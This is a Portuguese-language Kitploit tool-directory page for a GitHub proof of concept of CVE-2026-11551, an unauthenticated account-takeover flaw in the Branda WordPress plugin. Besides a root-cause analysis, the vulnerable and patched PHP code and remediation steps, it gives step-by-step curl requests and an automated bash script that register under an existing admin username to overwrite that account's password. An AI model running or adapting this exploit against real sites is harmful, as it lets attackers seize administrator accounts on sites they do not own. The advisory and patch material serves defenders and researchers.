Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
By-Poloss..-..CVE-2026-11551-PoC — Unauthenticated Privilege Escalation via Account Takeover | Kitploit
Ferramentas/GitHubGitHub/polosss/by-poloss..-..cve-2026-11551-poc
Privilege EscalationPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubpolosss/by-poloss..-..cve-2026-11551-poc

By-Poloss..-..CVE-2026-11551-PoC

Unauthenticated Privilege Escalation via Account Takeover

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 2 mesesAinda não revisado

CVE-2026-11551: Plugin Branda - Escalação de Privilégio Não Autenticada via Tomada de Conta

Visão Geral

  • CVE ID: CVE-2026-11551
  • Pontuação CVSS: 9.8 (Crítico)
  • Afetado: Branda – White Label & Branding <= 3.4.29
  • Corrigido: 3.4.31
  • Publicado: 19 de junho de 2026

Descrição da Vulnerabilidade

O plugin Branda para WordPress é vulnerável a escalação de privilégio via tomada de conta em todas as versões até e incluindo a 3.4.29. Isso ocorre porque o plugin não valida corretamente a identidade de um usuário antes de atualizar sua senha. Isso possibilita que atacantes não autenticados alterem senhas de usuários arbitrários, incluindo administradores, e aproveitem isso para obter acesso à sua conta.

Análise Técnica

Localização do Código Vulnerável

/inc/modules/login-screen/signup-password.php

Causa Raiz

A função pre_insert_user_data() na versão vulnerável carece de validação adequada:

root@kitploit:~
// Versão vulnerável (3.4.29)
public function pre_insert_user_data( $data, $update, $id ) {
    if ( is_multisite() ) {
        // Código Multisite...
    }
    // Faltando: if ($update) return $data; <-- VULNERABILIDADE
    
    if ( empty( $data['user_pass'] ) && empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( wp_generate_password( 20, false ) );
    } elseif ( ! empty( $_POST['password_1'] ) ) {
        // Define a senha a partir dos dados POST
        $data['user_pass'] = wp_hash_password( $_POST['password_1'] );
    }

    return $data;
}

Código Corrigido (3.4.31)

root@kitploit:~
public function pre_insert_user_data( $data, $update, $id ) {
    if ( is_multisite() ) {
        // Código Multisite com verificações adequadas...
    }

    // CORREÇÃO: Adicionada verificação para evitar atualizar usuários existentes
    if ( $update ) {
        return $data;
    }

    if ( empty( $data['user_pass'] ) && empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( wp_generate_password( 20, false ) );
    } elseif ( ! empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( $_POST['password_1'] );
    }

    return $data;
}

Vetores de Ataque

Vetor 1: Registro Multisite (Principal)

  1. Atacante acessa /wp-signup.php
  2. Registra com nome de usuário admin existente (ex.: "admin")
  3. Define senha personalizada via parâmetro password_1
  4. Branda armazena a senha nos metadados de inscrição
  5. Quando ativada, a senha sobrescreve a senha do admin existente

Vetor 2: Registro em Site Único

  1. Atacante acessa /wp-login.php?action=register
  2. Branda adiciona campos de senha ao formulário
  3. Atacante submete registro com nome de usuário existente
  4. Se a ativação for concluída, a senha é definida

Prova de Conceito (curl)

Passo 1: Verificar se o Registro está Habilitado

root@kitploit:~
curl -s -k "https://ALVO/wp-login.php?action=register" | grep -i "registration"

Passo 2: Verificar Tipo de WordPress (Multisite vs Único)

root@kitploit:~
curl -s -k -I "https://ALVO/wp-signup.php" | grep "HTTP/"

Passo 3: Para Multisite - Registrar com Nome de Admin

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://ALVO/wp-signup.php" \
  -d "user_name=admin" \
  -d "[email protected]" \
  -d "password_1=NewP@ssw0rd!" \
  -d "password_2=NewP@ssw0rd!" \
  -d "signup_for=blog"

Passo 4: Para Site Único - Registrar

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://ALVO/wp-login.php?action=register" \
  -d "user_login=admin" \
  -d "[email protected]" \
  -d "password_1=NewP@ssw0rd!" \
  -d "password_2=NewP@ssw0rd!" \
  -d "wp-submit=Register"

Passo 5: Ativar (se exigir verificação por email)

root@kitploit:~
# Extrair chave de ativação do email e visitar:
curl -s -k -c cookies.txt -b cookies.txt \
  "https://ALVO/wp-activate.php?key=CHAVE_DE_ATIVACAO"

Passo 6: Verificar - Tentar Login

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://ALVO/wp-login.php" \
  -d "log=admin" \
  -d "pwd=NewP@ssw0rd!" \
  -d "wp-submit=Log In" \
  -L | grep -i "dashboard\|wp-admin\|error"

Script de Exploração Automatizada

root@kitploit:~
#!/bin/bash
ALVO="https://ALVO"
USUARIO="admin"
NOVA_SENHA="Pwned$(date +%s)!"

echo "[*] Registrando $USUARIO com senha $NOVA_SENHA..."

# Ataque Multisite
curl -s -k -c /tmp/cookies.txt \
  -X POST "$ALVO/wp-signup.php" \
  -d "user_name=$USUARIO" \
  -d "[email protected]" \
  -d "password_1=$NOVA_SENHA" \
  -d "password_2=$NOVA_SENHA"

echo "[*] Verifique o email para o link de ativação"
echo "[*] Após ativação, tente: curl -X POST $ALVO/wp-login.php -d 'log=$USUARIO' -d 'pwd=$NOVA_SENHA'"

Requisitos para Exploração

  1. WordPress com o plugin Branda <= 3.4.29 instalado e ativado
  2. Registro de usuário deve estar habilitado (verifique Configurações > Gerais > Associação: Qualquer um pode se registrar)
  3. Para tomada de conta bem-sucedida: O nome de usuário alvo deve existir
  4. Para Multisite: Acesso ao email de ativação (ou bypass de ativação)

Remediação

Atualize o plugin Branda para a versão 3.4.31 ou superior:

root@kitploit:~
# Via Admin do WordPress
Painel > Plugins > Branda > Atualizar

# Via WP-CLI
wp plugin update branda-white-labeling

# Via SSH
wp plugin update branda-white-labeling --version=3.4.31

Impacto

  • Confidencialidade: Alto - Atacante ganha acesso a qualquer conta de usuário
  • Integridade: Alto - Atacante pode modificar conteúdo
  • Disponibilidade: Alto - Atacante pode bloquear usuários legítimos

Referências

  • Wordfence Intelligence
  • WPScan
  • Plugin Trac

W.P.E.F

  • W.P.E.F Telegram channel #1
  • W.P.E.F Telegram channel #2
Baixar ferramenta